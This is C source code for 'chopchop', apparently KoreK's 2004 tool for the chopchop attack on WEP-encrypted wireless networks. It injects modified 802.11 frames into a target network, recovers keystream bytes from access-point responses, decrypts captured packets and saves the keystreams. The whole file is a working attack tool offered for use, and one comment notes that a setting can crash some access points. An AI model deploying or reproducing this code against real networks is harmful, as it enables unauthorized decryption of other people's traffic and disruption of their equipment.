/* chopchop.c

   Author : KoreK
   Date : Sep 10, 2004
   Licence : GPL v2 or above (see accompanying COPYING file)

   Copyright (c) 2004 KoreK, All Rights Reserved
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <time.h>

#include <sys/poll.h>
#include <sys/time.h>
#include <net/if.h>

#include "crc.h"
#include "rc4.h"
#include "pcap_readwrite.h"
#include "p80211.h"
#include "wlan.h"



/* command line stuff */
const char version[]=
"chopchop version 0.1\n"
"\n"
"Copyright (c) 2004 KoreK\n"
"This is free software; see the source for copying conditions.  There is NO\n"
"warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE,\n"
"to the extent permitted by law.\n";

const char usage[]=
"chopchop version 0.1 (c) 2004 KoreK\n"
"Usage : chopchop [-s] [-v] [-h] [-i <interface>] [-stripfcs]\n"
"                 [-o <pcap-output>] [-w wep-base-fn] [-d depth]\n"
"                 [-burst <count>] [-bdelay <delay>] [-backoff <delay>]\n"
"                 [-maxcount <max-count>] [-size <min> | -Size <min>]\n"
"                 [-n | -m <MAC>] -b <BSSID> -p <pcap-input>\n"
"\n"
"See README for instructions, COPYING for license\n\n";

struct arguments {
    char *pcap_fn;
    char *out_fn;
    char *wep_fn;

    char dev[IFNAMSIZ];

    u_char bssid[6];
    u_char MAC[6];
    u_char *mac;    
};

/* default arguments */
struct arguments arg[1] = {
    {
	.pcap_fn = 0,
	.out_fn = 0,
	.wep_fn = 0,
	.dev = "wlan0",
	.bssid = {0,0,0,0,0,0},
	.MAC = {0,0,0,0,0,0},
	.mac = 0
    }};

int string_to_MAC(const char *s,u_char *MAC);
int get_args(int argc,char **argv,struct arguments *args);
void free_args(struct arguments *args);



/* IV managing */
struct iv_stream {
    u_char IV[4];
    size_t len;
    size_t min,max;     // will be used if there is any v0.2
    u_int *stream;
    struct iv_stream *next;
};

struct iv_stream *get_iv(struct iv_stream *iv_list,
			 const u_char IV[4]);

struct iv_stream *has_iv(struct iv_stream *iv_list,
			 const u_char IV[4]);

void free_ivs(struct iv_stream *iv_list);

int save_ivs(const char *base_name,
	     const struct iv_stream *iv_list);



/* most of the stuff chopchop is made of */
#define NO_MATCH -1
#define FAILED -2


/* struct chopchop_sched holds various values controlling chopchop and 
   its dependent functions. 
   Warning delays are in ms, so avoid values > 2000s */
struct chopchop_sched {
    // used in chopchop 
    int max_count;       // number of guesses to try before failing 
    int scramble;        // does chopchop scramble packets
    int backoff;         // how long do we wait inbetween rw_cycle

    // used by inject_packets:
    int inject_rw_delay; //  delay take by a rw_cycle delay (ms)
    int inject_count;    //  how many packets do we inject 
};


/* used internally by chopchop */
struct guess {
    int count;
    u_char guess;
};


/* cracks PRGA of valid packet down to/up to end_len */
int chopchop(int fd,
	     const u_char *raw_data,
	     size_t raw_data_len,
	     struct iv_stream *w,
	     size_t end_len,
	     const u_char *Smac,
	     const u_char *bssid,
	     struct chopchop_sched *sc);

int inject_packets(int fd,
		   p80211_frame_t frame,
		   const u_char *mask,
		   struct guess *g,
		   u_char *smac,
		   u_char *dmac,
		   const u_char *bssid,
		   int dir,
		   const struct chopchop_sched *sc);

int rw_cycle(int fd,
	     const p80211_frame_t f,
	     const u_char *smac,
	     const u_char *dmac,
	     const u_char *bssid,
	     int delay);

int read_match(int fd,
	       const u_char *smac,
	       const u_char *dmac,
	       const u_char *bssid);

void scramble_data(u_char *buf1,
		   u_char *buf2,
		   size_t data_len,
		   int bit0);

void randomMAC(u_char *mac);



/* packet recognition stuff: the last eight bytes are deduced 
   from their decrypted crc */
enum {
    IP_pk=0,
    ARP_pk=1,
    UNK_pk=2     // last one, for unrecognized headers
};

/* first eight byte of possible packets + 4 byte CRC, 
   feel free to add others, and update the preceding union */
u_char pkh[2][12]={
    {0xaa,0xaa,0x03,0x00,0x00,0x00,0x08,0x00, 0xab,0x50,0x39,0xf3},
    {0xaa,0xaa,0x03,0x00,0x00,0x00,0x08,0x06, 0x9e,0xf5,0x5a,0x1a}
};



/* globals */
struct chopchop_sched default_sc[1]={
    {
	.max_count = -1,
	.scramble = 1,
	.inject_rw_delay = 0,
	.inject_count = 13,
	.backoff = 3
    }
};

struct iv_stream iv_list[1]= { 
    {
	.IV = {0,0,0,0}, 
	.len = 0, 
	.min = 0,
	.max = 0, 
	.next = 0
    }
};  // ie empty

int verbose = 1;
int stripfcs = 0;
int depth = 8;


int main(int argc,char **argv)
{
   /* vars to parse the pcap data */
    struct pcap_capture capture[1];
    struct pcap_node *node;
    int pack_cnt;
    int ret;
    
    /* vars to inject traffic */
    int wlan_d;


    /* parse the command line */
    if (!get_args(argc,argv,arg)) return 1;

    srand(time(0));

    // get the packets
    init_pcap_capture(capture);
    ret=read_pcapfile(arg->pcap_fn,capture);
    if (ret) {
	fprintf(stderr,"Cannot open the pcap file %s (%d-%d) - exiting ...\n",
		arg->pcap_fn,ret,capture->linktype);
	return 1;
    }	

    // open the wlan device  
    wlan_d=open_wlan(arg->dev);
    if (wlan_d<0) {
	fprintf(stderr,"Cannot open the wlan device %s\n",arg->dev);
	return 1;
    }


    if (stripfcs) {
	for (node=capture->first; 
	     node!=0; 
	     node=node->next) {
	    node->w_packet->frame_len -= 4;
	    node->pkt_header->caplen -= 4;
	    node->pkt_header->len -= 4;
	}
    }



    /* First pass: decrypt packet down to 9th byte */
    printf("first pass\n");
    fflush(stdout);
    for (pack_cnt=1, node=capture->first; 
	 node!=0; 
	 node=node->next, pack_cnt++) {

	printf("-----------------\n"
	       "packet number %03d\n",pack_cnt);
	fflush(stdout);

 	if (node->w_packet->frame) {
	    struct iv_stream *w;

	    w = get_iv(iv_list,node->w_packet->frame);

	    /* works only in disassociated mode right now */
	    ret = chopchop(wlan_d,
			   node->w_packet->frame,
			   node->w_packet->frame_len,
			   w,
			   depth,
			   arg->mac,
			   arg->bssid,
			   default_sc);

	    if (ret != depth) printf("fail\n");
	    else printf(" OK \n");
	} 
	else printf("Pass\n");
	fflush(stdout);
    }

    /* Second pass: Decrypt packet using crc's for known headers */
    printf("\nsecond pass\n");
    fflush(stdout);
    for (pack_cnt=1, node=capture->first; 
	 node!=0; 
	 node=node->next, pack_cnt++) {

 	if (node->w_packet->frame) {	    
	    u_char *data;
	    size_t data_len;
	    int decrypted=0;
	    struct iv_stream *w;
	    u_int i;

	    data_len = node->w_packet->frame_len-4;
	    w = get_iv(iv_list,node->w_packet->frame);

	    for (i=8; (i<data_len) && (w->stream[i]!=0); i++);

	    if (i == data_len) {
		/* get the header */
		data = (u_char *)malloc(data_len);    
		if (data == 0) {
		    perror("main_malloc");
		    return 1;
		}

		memcpy(data,node->w_packet->frame+4,data_len);
		for (i=8; i<data_len; i++) data[i] ^= w->stream[i] & 0xff;
		for (i=data_len; i>12; i--) trunc_crc(data,i,data[i-1]);
		    
		for (i=0; 
		     (i< UNK_pk) && (memcmp(pkh[i]+8,data+8,4) != 0); 
		     i++);

		if (i < UNK_pk) {
		    int j;
		    for (j=0; j<8; j++) {
			if ((w->stream[j] != 0) && 
			    ((w->stream[j] & 0xff) != (data[j] ^ pkh[i][j])))
			    printf("Warning differing PRGA's \n");
			w->stream[j] = (data[j] ^ pkh[i][j]) | 0x0100;
		    }
		    decrypted = 1;
		}
		
		free(data);
	    }

	    /* decrypt the packet into the pcap file */
	    /* pull the IV and decrypt */
	    data = node->w_packet->frame + 4;
	    for (i=0; i<data_len; i++)
		if (w->stream[i]) 
		    node->w_packet->frame[i] = data[i] ^ (w->stream[i] & 0xff);
	    node->w_packet->frame_len -= 4;
	    node->pkt_header->caplen -= 4;
	    node->pkt_header->len -= 4;

	    /* treat the special case of ethernet frames captured 
	       in promiscuouse mode */ 
	    data = node->w_packet->frame;
	    if ((capture->linktype == DLT_EN10MB) && 
		decrypted & (data[0] == 0xaa) & (data[1] == 0xaa)) {
		memcpy(node->pkt_body+12,data+6,2);
		memmove(data,data+8,data_len-8);
		node->w_packet->frame_len -= 8;
		node->pkt_header->caplen -= 8;
		node->pkt_header->len -= 8;
	    }
	    
	    /* turn off the wep flag in 802.11 frames */
	    if ((capture->linktype == DLT_IEEE802_11) && decrypted) 
		node->pkt_body[1] &= 0xbf; 

	    /* and remove the FCS */
	    if (decrypted) {
		node->w_packet->frame_len -= 4;
		node->pkt_header->caplen -= 4;
		node->pkt_header->len -= 4;
	    }
	}
    }

    write_pcapfile(arg->out_fn,capture);
    save_ivs(arg->wep_fn,iv_list);

    free_ivs(iv_list);
    close_wlan(wlan_d);
    return 0;

}




/* 
   chopchop cracks bytes [end_len..data_len-1] or 
   [data_len..end_len-1] of the PRGA:, where 
   data_len=raw_data_len-4, and raw_data is the data from 
   a valid wep packet. 

   raw_data=iv[0..3] . data[0..data_len-1] with data_len>=8
   w stores the PRGA stream.

   end_len specifies the range of bytes to crack:
      end_len>data_len : classical Arbaugh (variation).
      end_len<data_len : inverted Arbaugh.

   Smac specifies the type of attack:
      Smac != 0: hijack a current association, use AP retransmission of
                 valid multicast packets.
      Smac == 0: non associated, use AP deauth response to valid packets.

   bssid,fd the obvious parameters

   sc are scheduling parameters controlling the different stages
   of the attack.
*/
int chopchop(int fd,
	     const u_char *raw_data,
	     size_t raw_data_len,
	     struct iv_stream *w,
	     size_t end_len,
	     const u_char *Smac,
	     const u_char *bssid,
	     struct chopchop_sched *sc)
{
    p80211_frame_t frame;
    u_char *mask;
    u_char *data;
    size_t data_len,max_data_len;

    u_char smac_b[6];
    u_char *smac=0;
    u_char dmac[6];

    size_t wep_idx;    //index of the attacked byte
    int dir;           //direction

    struct guess g[1];
    int match,max_count;


    // checks TODO: correct bounds for raw_data_len/end_len
    if ((raw_data == 0) || (raw_data_len < 8) || 
	(w == 0) || (bssid == 0) || 
	(end_len < 4) || (end_len >= 1600))
	return FAILED;

    max_count = (sc->max_count <= 0) ? 0 : sc->max_count;

    data_len=raw_data_len-4;
    if (data_len == end_len) return end_len;

    if (end_len < data_len) {
	dir = -1;
	wep_idx = data_len - 1;
	max_data_len = data_len;
    }
    else {
	dir = 1;
	wep_idx = data_len;
	max_data_len = end_len;
    }

    // prepare the wep if not enough space/not allocated
    if (w->stream == 0) {
	w->stream=(u_int *)calloc(max_data_len,sizeof(u_int));
	if (w->stream == 0) return FAILED;
	w->len=max_data_len;
    }
    else if (w->len < max_data_len) {
	u_int *ns;

	ns=realloc(w->stream,sizeof(u_int)*max_data_len);
	if (ns == 0) return FAILED;
	w->stream=ns;
	for (; w->len<max_data_len; w->len++) w->stream[w->len]=0;
    }

    // prepare the smac
    if (Smac) {
	smac = 0;
    }
    else {
	smac=smac_b;
	randomMAC(smac);
	smac[0] = 0x00;                    // not multicast/plain
	smac[1] = smac[1] | 0x40;          // not 00:00:00:00:00:00
    }

    // prepare the dmac
    randomMAC(dmac);
    if (smac) dmac[0]=0;                   // unicast
    else dmac[0] = 0xff;                   // multicast
    dmac[1] = dmac[1] & 0x7f;              // not ff:ff:ff:ff:ff:ff

    if (verbose) {
	printf("base src mac: ");
	fprint_hex_buffer(stdout,smac ? smac : Smac,6);
	printf("base dst mac: ");
	fprint_hex_buffer(stdout,dmac,6);
    }

    // build the valid frame
    frame = make_frame(0,0,max_data_len+4);      // allocate enough space
    if (frame == 0) return FAILED;
    p80211_set_type(frame,DATA_FRAME);
    p80211_set_flag(frame,wep_f | toDS_f,1);
    p80211_set_mac(frame,BSSID,bssid);
    if (!smac) p80211_set_mac(frame,SA,Smac);    // if smac constant
    memcpy(frame->data,raw_data,raw_data_len);
    frame->data_len = raw_data_len;
 
    data = frame->data + 4;

    // set up mask 
    mask = (u_char *)calloc(max_data_len,1);
    if (mask == 0) {
	free_frame(frame);
	return FAILED;
    }

    /* scramble the packet */
    if (sc->scramble) scramble_data(data,mask,data_len,1);

    /* crack it byte by byte : variables should verify
       data_len        : current valid data_len 
       frame           : valid frame
       frame->data_len : 4 + data_len 
       wep_idx         : data_len-1 if dir==-1, data_len if dir==1 */
    while (data_len != end_len) {
        // if wep byte unknown
	if (w->stream[wep_idx] == 0) {
	    match = NO_MATCH;
	    g->guess = 0;
	    g->count = max_count;

	    while ((max_count == 0) || (g->count > 0)) {
		match = inject_packets(fd,frame,mask,g,smac,dmac,bssid,dir,sc);
		if (match != NO_MATCH) break;

		if (match == NO_MATCH) 
		    match = rw_cycle(fd,0,smac,dmac,bssid,sc->backoff);
		if (match != NO_MATCH) break;
	    }

	    if (match == NO_MATCH) match = rw_cycle(fd,0,smac,dmac,bssid,200);

	    if (match == NO_MATCH) break;

	    if (match < 0) goto failed;

	    if (verbose) printf("guess 0x%02x / number of frame written %4d\n",
				match,max_count-g->count);

	    w->stream[wep_idx] = 
		(match ^ mask[wep_idx] ^ data[wep_idx]) | 0x100;
	}

	/* update the data */
	if (dir == 1) {
	    ext_crc1(data,data_len);
	    ext_crc1(mask,data_len);
	    data[wep_idx] ^= w->stream[wep_idx] & 0xff;
	}
	else {
	    u_char mguess;     // last decrypted byte of the valid 
	    mguess = (w->stream[wep_idx] & 0xff) ^ data[wep_idx];
	    trunc_crc(data,data_len,mguess);
	    trunc_crc(mask,data_len,mguess);
	}

	data_len += dir;
	frame->data_len += dir;
	wep_idx += dir;

	dmac[4]++;
	if (smac) smac[4]++;
	if (sc->scramble) scramble_data(data,mask,data_len,0);
    }

    free_frame(frame);
    free(mask);
    return data_len;

 failed:
    free_frame(frame);
    free(mask);
    return match;
}



/* injects modified packets given a valid frame, a guess g

   controlled by:
   sc->inject_rounds   : how many guesses to try at once
   sc->inject_rw_delay : rw_cycle delay (ms) 

 */
int inject_packets(int fd,
		   p80211_frame_t frame,
		   const u_char *mask,
		   struct guess *g,
		   u_char *smac,
		   u_char *dmac,
		   const u_char *bssid,
		   int dir,
		   const struct chopchop_sched *sc)
{
    int cnt;
    size_t data_len;
    u_char *data;
    int match;

    data = frame->data + 4;
    data_len = frame->data_len - 4;

    for (cnt=sc->inject_count; cnt>0; cnt--) {
	if (smac) {
	    smac[5] ^= g->guess;
	    p80211_set_mac(frame,SA,smac);
	    smac[5] ^= g->guess;
	}
	dmac[5] ^= g->guess;
	p80211_set_mac(frame,DA,dmac);
	dmac[5] ^= g->guess;

	// modify data/data_len
	if (dir == 1) {
	    ext_crc1(data,data_len);
	    data[data_len] ^= g->guess;
	}
	else trunc_crc(data,data_len,g->guess ^ mask[data_len-1]);
	frame->data_len += dir;
	
	match = rw_cycle(fd,frame,smac,dmac,bssid,sc->inject_rw_delay);

	// restore data/data_len
	if (dir == 1) {
	    ext_crc1(data,data_len);
	    data[data_len] = 0;
	}
	else trunc_crc(data,data_len,g->guess ^ mask[data_len-1]);
	frame->data_len -= dir;

	g->guess = (g->guess + 1) & 0xff;
	g->count--;
	if (match != NO_MATCH) return match;
    }
	
    return NO_MATCH;
}



/* write frame once (if f != 0) and read packets, 
   operation should last at least delay (in ms) - 
   return NO_MATCH,FAILED or correct guess */
int rw_cycle(int fd,
	     const p80211_frame_t f,
	     const u_char *smac,
	     const u_char *dmac,
	     const u_char *bssid,
	     int delay)
{
    struct timeval start_time[1],current_time[1];
    struct timezone tz[1];
    struct pollfd pollev[1];
    int match,ret;
    int udelay;

    udelay = delay * 1000;                 // remaning delay in us
    gettimeofday(start_time,tz);

    pollev->fd = fd;
    if (f) pollev->events = POLLIN | POLLPRI | POLLOUT;
    else   pollev->events = POLLIN | POLLPRI;

    while ((udelay >= 0) || (pollev->events & POLLOUT)) {
	ret=poll(pollev,1,udelay/1000);

	if (ret < 0) return FAILED;
	if (ret == 0) continue;

	if (pollev->revents & (POLLERR | POLLHUP | POLLNVAL)) return FAILED;
	if (pollev->revents & (POLLIN | POLLPRI)) {
	    match = read_match(fd,smac,dmac,bssid);
	    if (match != NO_MATCH) return match;
	}
	else if (pollev->revents & POLLOUT) {
	    ret = write_frame(fd,f);
	    if (ret < 0) return FAILED;
	    pollev->events = POLLIN | POLLPRI;
	}

	gettimeofday(current_time,tz);	
	current_time->tv_usec -= start_time->tv_usec;
	current_time->tv_sec -= start_time->tv_sec;
	udelay -= (current_time->tv_sec * 1000000 + current_time->tv_usec);
    }
    return NO_MATCH;
}



/* read_match: smac and dmac are base mac
   1) read a packet
   2) check condition: 
      if smac != 0, look for smac-matching disassociate
      if smac == 0, look for dmac-matching fromDS multicast 
   3) dispose packet
   returns match if success
   else return 
*/
int read_match(int fd,
	       const u_char *smac,
	       const u_char *dmac,
	       const u_char *bssid)
{
    p80211_frame_t r_frame;    
    const u_char *Dmac;
    int ret=NO_MATCH;

    r_frame=read_frame(fd);
    if (r_frame) {
	if (smac) {
	    // look for deauth frames matching our current src
	    if (p80211_type(r_frame) == DEAUTH_FRAME) {
		fprintf(stderr,"match");
		Dmac = p80211_mac(r_frame,DA);
		if (memcmp(Dmac,smac,5) == 0) ret = Dmac[5] ^ smac[5];
	    }
	}   // look for broadcast matching our current dst
	else {
	    if ((p80211_type(r_frame) == DATA_FRAME) && 
		p80211_flag(r_frame,fromDS_f)) {
		Dmac = p80211_mac(r_frame,DA);
		if (memcmp(Dmac,dmac,5) == 0) ret = Dmac[5] ^ dmac[5];
	    }
	}
	free_frame(r_frame);
	return ret;
    }
    else {
	fprintf(stderr,"error reading should return FAILED - ignoring\n");
	return ret;
    }
}



void randomMAC(u_char *mac)
{
    int i;
    for (i=0; i<6; i++) mac[i]=random() & 0xff;
}



void scramble_data(u_char *buf1,u_char *buf2,size_t data_len,int bit0)
{
    u_char mask[3000];
    size_t i;

    if ((data_len>=8) && (data_len<=3000)) {
	for (i=0; i<data_len-4; i++) mask[i]=random() & 0xff;
	mask[0] = (mask[0] & 0xfe) | (bit0 & 1);
	add_crc_mask(mask,data_len-4);
	for (i=0; i<data_len; i++) {
	    buf1[i] ^= mask[i];
	    buf2[i] ^= mask[i];
	}
    }
}



struct iv_stream *get_iv(struct iv_stream *iv_list,const u_char IV[4])
{
    struct iv_stream *node=iv_list;

    if (iv_list == 0) return 0;

    if (node->stream == 0) {
	// empty list
	memcpy(node->IV,IV,4);
	return node;
    }

    if (memcmp(node->IV,IV,4) == 0) return node;
   
    while (node->next != 0) {
	node = node->next;
	if (memcmp(node->IV,IV,4) == 0) return node;
    };

    node->next = (struct iv_stream *)calloc(1,sizeof *(node->next));
    if (node->next) memcpy(node->next->IV,IV,4);

    return node->next;
}



struct iv_stream *has_iv(struct iv_stream *iv_list,const u_char IV[4])
{
    struct iv_stream *node=iv_list;

    if (iv_list == 0) return 0;

    if (node->stream == 0) return 0;

    if (memcmp(node->IV,IV,4) == 0) return node;
   
    while (node->next != 0) {
	node = node->next;
	if (memcmp(node->IV,IV,4) == 0) return node;
    };

    return 0;
}



void free_ivs(struct iv_stream *iv_list)
{
    struct iv_stream *node;

    if (iv_list == 0) return;

    if (iv_list->stream) free(iv_list->stream);

    node = iv_list->next;
    while (node != 0) {
	iv_list->next = node->next;
	if (node->stream) free(node->stream);
	free(node);
	node = iv_list->next;
    }
}



#define EXT_SIZE 8     // length for key+key# in hex

int save_ivs(const char *base_name,const struct iv_stream *iv_list)
{
    char *fn,*fn_nb;
    size_t bn_len;

    bn_len = strlen(base_name);
    fn = (char *)malloc(bn_len + EXT_SIZE + 1);
    if (fn == 0) return FAILED;
    memcpy(fn,base_name,bn_len);
    fn_nb = fn + bn_len;

    while (iv_list != 0) {
	if (iv_list->stream) {
	    size_t iv_len;

	    //remove trailing 0s
	    for (iv_len = iv_list->len;
		 (iv_len > 0) && (iv_list->stream[iv_len-1] == 0);
		 iv_len--);

	    if (iv_len != 0) {
		FILE *f;
		size_t ret;

		snprintf(fn_nb,EXT_SIZE+1,"%02hhx%02hhx%02hhx%02hhx",
			 iv_list->IV[0],iv_list->IV[1],
			 iv_list->IV[2],iv_list->IV[3]);
		fn[bn_len+EXT_SIZE] = 0;

		f = fopen(fn,"w");
		if (f == 0) goto failed;

		ret = fwrite(iv_list->IV,4,1,f);
		if (ret != 1) goto failed;

		ret = fwrite(iv_list->stream,sizeof(u_int),iv_len,f);
		if (ret != iv_len) goto failed;

		fclose(f);
	    }
	}
	iv_list=iv_list->next;
    }

    free(fn);
    return 0;
 failed:
    free(fn);
    return FAILED;
}



/* parse a string to a MAC, stripping leading/ending whitespaces */
int string_to_MAC(const char *s,
		  u_char *MAC)
{
    int res;
    unsigned int mac[6],i;
    char last;

    res=sscanf(s,"%2x:%2x:%2x:%2x:%2x:%2x %c",
	       mac,mac+1,mac+2,mac+3,mac+4,mac+5,&last);
    printf("%s %d\n",s,res);
    if (res!=6) return -1;
    for (i=0; i<6; i++) MAC[i]=mac[i];
    return 0;
}



/* option parsing - gotta learn getopt */
int get_args(int argc,char **argv,struct arguments *args)
{
    int i;
    int len;

    int err=0;
    int hasbssid=0,hasmac=0;
    int hasin=0,hasout=0,hasdev=0,haswepbase=0;

    for (i=1; (!err) && (i<argc); i++) {
	if (strcmp(argv[i],"-bdelay") == 0) {
	    if (++i< argc) {
		default_sc->inject_rw_delay = atoi(argv[i]);
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-backoff") == 0) {
	    if (++i < argc) {
		default_sc->backoff = atoi(argv[i]);
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-burst") == 0) {
	    if (++i < argc) {
		default_sc->inject_count = atoi(argv[i]);
		if (default_sc->inject_count <= 0) err = 1;
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-maxcount") == 0) {
	    if (++i < argc) {
		default_sc->max_count = atoi(argv[i]);
	    }
	    else err = 1;

 	} 

	else if (strcmp(argv[i],"-size") == 0) {
	    if (++i < argc) {
		printf("not implemented \n");
		err = 1;
	    }
	    else err = 1;
 	} 

	else if (strcmp(argv[i],"-Size") == 0) {
	    if (++i < argc) {
		printf("not implemented \n");
		err = 1;
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-v") == 0) {
	    printf(version);
	    return 0;
 	}

	else if (strcmp(argv[i],"-h") == 0) {
	    printf(usage);
	    return 0;
	}

	else if (strcmp(argv[i],"-s") == 0) {
	    verbose = 0;
	}

	else if (strcmp(argv[i],"-stripfcs") == 0) {
	    stripfcs = 1;
	} 

	else if (strcmp(argv[i],"-n") == 0) {
	    if (hasmac) err = 1;
	    else {
		printf("Warning : works in theory not in practice\n");
		hasmac = 1;
		args->mac = 0;
	    }
	}

	else if (strcmp(argv[i],"-i") == 0) {
	    if (!hasdev && (++i < argc)) {
		hasdev = 1;
		len = 1 + strlen(argv[i]);
		if (len > IFNAMSIZ) {
		    printf("dev name too long\n");
		    err = 1;
		}
		memcpy(args->dev,argv[i],len);
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-o") == 0) {
	    if (!hasout && (++i < argc)) {
		hasout = 1;
		len = 1 + strlen(argv[i]);
		args->out_fn = (char *)malloc(len);
		if (args->out_fn) memcpy(args->out_fn,argv[i],len);
		else err = 1;
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-p") == 0) {
	    if (!hasin && (++i < argc)) {
		hasin = 1;
		args->pcap_fn = argv[i];
	    }
	    else err=1;
	} 

	else if (strcmp(argv[i],"-w") == 0) {
	    if (!haswepbase && (++i < argc)) {
		haswepbase = 1;
		len = 1 + strlen(argv[i]);
		args->wep_fn = (char *)malloc(len);
		if (args->wep_fn) memcpy(args->wep_fn,argv[i],len+1);
		else err = 1;
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-m") == 0) { 
	    if (!hasmac && (++i < argc)) { 
		hasmac = 1;
		if (string_to_MAC(argv[i],args->MAC) != 0) err=1;
		args->mac = args->MAC;
	    }
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-b") == 0) { 
	    if (!hasbssid && (++i < argc)) {
		hasbssid = 1;
		if (string_to_MAC(argv[i],args->bssid) != 0) err=1;
		printf("%d\n",err);
	    }	
	    else err = 1;
	} 

	else if (strcmp(argv[i],"-d") == 0) {
	    if (++i < argc) {
		int d;
		
		d = atoi(argv[i]);
		if (d < 4) {
		    printf("invalid depth, must be >= 4\n");
		    err = 1;
		} 
		else {
		    depth = d;
		    if (d == 4) 
			printf("Warning depth == 4 crashes some AP\n");
		}
	    }
	    else err = 1;
	}
    }

    if (err) {
	fprintf(stderr,"Too many/not enough arguments - wrong options\n");
	fprintf(stderr,usage);
	return 0;
   }

    if (!(hasbssid && hasmac && hasin)) {
	fprintf(stderr,"Missing arguments\n");
	fprintf(stderr,usage);
	return 0;
    }

    if (!haswepbase) {
	len = strlen(args->pcap_fn);
	args->wep_fn = (char *)malloc(len+5);
	if (args->wep_fn) {
	    memcpy(args->wep_fn,args->pcap_fn,len);
	    memcpy(args->wep_fn+len,".iv.",5);
	}
	else return 0;
    }

    if (!hasout) {
	len = strlen(args->pcap_fn);
	args->out_fn = (char *)malloc(len+5);
	if (args->out_fn) {
	    memcpy(args->out_fn,args->pcap_fn,len);
	    memcpy(args->out_fn+len,".dec",5);
	}
	else return 0;
    }

    return 1;
}


void free_args(struct arguments *args)
{
    free(args->out_fn);
    free(args->wep_fn);
}
